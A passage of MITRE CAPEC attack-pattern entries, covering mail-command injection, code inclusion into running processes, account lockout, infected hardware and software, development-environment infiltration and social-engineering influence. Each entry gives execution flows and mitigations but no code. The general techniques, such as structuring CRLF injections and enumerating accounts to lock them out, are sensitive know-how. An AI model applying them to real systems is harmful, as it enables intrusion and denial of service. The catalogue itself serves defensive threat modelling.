Structure the injection as a header, body, and footer. The header contains the ending of the expected message, the body contains the injection of the new command, and the footer contains the beginning of the expected command.
Each part of the injection payload needs to be terminated with the CRLF (%0d%0a) sequence.

Prerequisites

The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker.

The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server.

The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server.

Resources Required

None: No specialized resources are required to execute this type of attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server.

Related Weaknesses

CWE-ID	Weakness Name
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')

References

[REF-49] "OWASP Web Security Testing Guide". Testing for IMAP SMTP Injection. The Open Web Application Security Project (OWASP). <https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Execution_Flow

CAPEC-640: Inclusion of Code in Existing Process

Attack Pattern ID: 640

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	251	Local Code Inclusion

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Determine target process: The adversary determines a process with sufficient privileges that they wish to include code into.

Techniques
On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

Attempt to include simple code with known output: The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process.

Exploit

Include arbitrary code into existing process: Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process's memory.

Prerequisites

The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code.

Skills Required

[Level: High]

Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL.

Consequences

Scope	Impact	Likelihood
Integrity Confidentiality	Execute Unauthorized Commands Read Data

Mitigations

Prevent unknown or malicious software from loading through using an allowlist policy.

Properly restrict the location of the software being used.

Leverage security kernel modules providing advanced access control and process restrictions like SELinux.

Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.

Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.

Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.

Monitor processes and command-line arguments for unknown behavior related to code injection.

Related Weaknesses

CWE-ID	Weakness Name
114	Process Control
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1505.005	Server Software Component: Terminal Services DLL
1574.006	Hijack Execution Flow: Dynamic Linker Hijacking
1574.013	Hijack Execution Flow: KernelCallbackTable
1620	Reflective Code Loading

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Mitigations, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description, Related_Weaknesses, Taxonomy_Mappings

CAPEC-546: Incomplete Data Deletion in a Multi-Tenant Environment

Attack Pattern ID: 546

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	545	Pull Data from System Resources

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system.

Skills Required

[Level: Low]

The adversary requires the ability to traverse directory structure.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.

Deletion of data should be completed promptly when requested.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control
1266	Improper Scrubbing of Sensitive Data from Decommissioned Device
1272	Sensitive Information Uncleared Before Debug/Power State Transition

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-461] Kopo M. Ramokapane, Awais Rashid and Jose M. Such. "Assured Deletion in the Cloud: Requirements, Challenges and Future Directions". Association for Computing Machinery (ACM). Proceedings of the 2016 ACM on Cloud Computing Security Workshop. <https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Name
Previous Entry Names
Change Date	Previous Entry Name
2021-10-21 (Version 3.6)	Probe Application Memory

CAPEC-2: Inducing Account Lockout

Attack Pattern ID: 2

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Experiment

Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout

Techniques
Analyze system documentation to find list of events that could potentially cause account lockout
Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.

Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out

Techniques
Obtain list of authorized users using another attack pattern, such as SQL Injection.
Attempt to create accounts if possible; system should indicate if a user ID is already taken.
Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

Exploit

Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out.
Techniques
For each user ID to be locked out, perform the lockout procedure discovered in the first step.

Prerequisites

The system has a lockout mechanism.

An attacker must be able to reproduce behavior that would result in an account being locked.

Skills Required

[Level: Low]

No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above.

Resources Required

Computer with access to the login portion of the target system

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption

Mitigations

Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.

When implementing security features, consider how they can be misused and made to turn on themselves.

Example Instances

A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction.

Related Weaknesses

CWE-ID	Weakness Name
645	Overly Restrictive Account Lockout Mechanism

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1531	Account Access Removal

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings

CAPEC-452: Infected Hardware

Attack Pattern ID: 452

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	441	Malicious Logic Insertion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	638	Altered Component Firmware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Access to the hardware currently deployed at a victim location.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Related Weaknesses

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Malicious Logic Insertion into Product Hardware

CAPEC-456: Infected Memory

Attack Pattern ID: 456

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	441	Malicious Logic Insertion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	457	USB Memory Attacks
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	458	Flash Memory Attacks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Leverage anti-virus products to detect stop operations with known virus.

Example Instances

A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.

In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords.

Related Weaknesses

CWE-ID	Weakness Name
1257	Improper Access Control Applied to Mirrored or Aliased Memory Regions
1260	Improper Handling of Overlap Between Protected Memory Ranges
1274	Improper Access Control for Volatile Memory Containing Boot Code
1312	Missing Protection for Mirrored Regions in On-Chip Fabric Firewall
1316	Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Attack_Patterns, Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	Malicious Logic Insertion into Product Memory

CAPEC-442: Infected Software

Attack Pattern ID: 442

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	441	Malicious Logic Insertion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	448	Embed Virus into DLL

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Leverage anti-virus products to detect and quarantine software with known virus.

Related Weaknesses

CWE-ID	Weakness Name
506	Embedded Malicious Code

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

[REF-387] Marshall Brain. "How Computer Viruses Work". MindPride. 2007. <http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, Examples-Instances, References, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Malicious Logic Inserted Into Product Software

2018-07-31 (Version 2.12)	Malicious Logic Inserted Into To Product Software

CAPEC-537: Infiltration of Hardware Development Environment

Attack Pattern ID: 537

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).

The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.

The adversary must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure.

Skills Required

[Level: Medium]

Intelligence about the manufacturer's operating environment and infrastructure.

[Level: High]

Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.

[Level: High]

Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)

Mitigations

Verify software downloads and updates to ensure they have not been modified be adversaries

Leverage antivirus tools to detect known malware

Do not download software from untrusted sources

Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks

Example Instances

The adversary, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the adversary to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The adversary is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Mitigations, Prerequisites, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-511: Infiltration of Software Development Environment

Attack Pattern ID: 511

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).

The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.

The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure.

Skills Required

[Level: Medium]

Intelligence about the manufacturer's operating environment and infrastructure.

[Level: High]

Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.

[Level: High]

Mitigations

Avoid the common delivery mechanisms of adversaries, such as email attachments, which could introduce the malware.

Example Instances

The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.

Using rogue versions of Xcode (Apple's app development tool) downloaded from third-party websites, it was possible for the adversary to insert malicious code into legitimate apps during the development process.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Some type of access control weakness (CWE-284 or its descendants) is related to this CAPEC, probably as a prerequisite.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, Mitigations
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-417: Influence Perception

Attack Pattern ID: 417

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	418	Influence Perception of Reciprocation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	420	Influence Perception of Scarcity
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	421	Influence Perception of Authority
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	422	Influence Perception of Commitment and Consistency
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	423	Influence Perception of Liking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	424	Influence Perception of Consensus or Social Proof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Resources Required

There are no necessary resources required for this attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

[REF-360] "Social Engineering: The Art of Human Hacking". 2010. Wiley.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Reciprocation

CAPEC-421: Influence Perception of Authority

Attack Pattern ID: 421

Abstraction: Detailed

